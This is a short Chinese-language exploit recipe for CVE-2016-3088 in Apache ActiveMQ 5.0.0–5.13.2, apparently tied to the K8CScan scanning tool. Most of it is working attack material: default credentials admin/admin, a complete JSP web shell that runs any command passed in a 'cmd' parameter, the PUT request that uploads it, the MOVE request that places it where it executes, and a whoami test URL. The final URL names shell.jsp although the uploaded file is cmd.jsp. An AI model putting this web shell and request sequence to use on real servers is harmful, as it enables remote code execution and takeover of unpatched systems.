漏洞利用 CVE 2016 3088 ActiveMQ GetShell Exploit
漏洞编号: CVE-2016-3088
漏洞原理: ActiveMQ 中的 FileServer 服务允许用户通过 PUT/MOVE方法上传文件到指定目录
影响版本: Apache ActiveMQ 5.0.0 – 5.13.2
PUT /fileserver/%20/%20
上传和移动文件需登陆,默认帐密admin/admin,已将cmd.jsp内容转义(请将EscapeChar打钩去掉)
PUT
AddUrl: /fileserver/cmd.jsp
PUTData: <%@ page import="java.io.*"%><%out.print("Hello");String strcmd = request.getParameter("cmd");String line =null;Process p=Runtime.getRuntime().exec(strcmd);InputStream is = p.getInputStream();BufferedReader br = new BufferedReader(new InputStreamReader(is));while((line =br.readLine())!=null){out.print(line+"");}%>
Authorization: admin:admin
根目录和fileserver均不解析JSP文件,好在admin和api目录可以解析
MOVE
AddUrl: /fileserver/cmd.jsp
Destination: file://C:/Users/null/Desktop/apache-activemq-5.9.0/webapps/admin/cmd.jsp
访问http://192.168.1.26:8161/admin/shell.jsp?cmd=whoami
Video1: https://github.com/k8gege/K8CScan/blob/master/Video/K8Cscan Apache ActiveMQ GetShell CVE-2016-3088.rar
Video2: WhatCMS指纹识别内网ActiveMQ&GetShell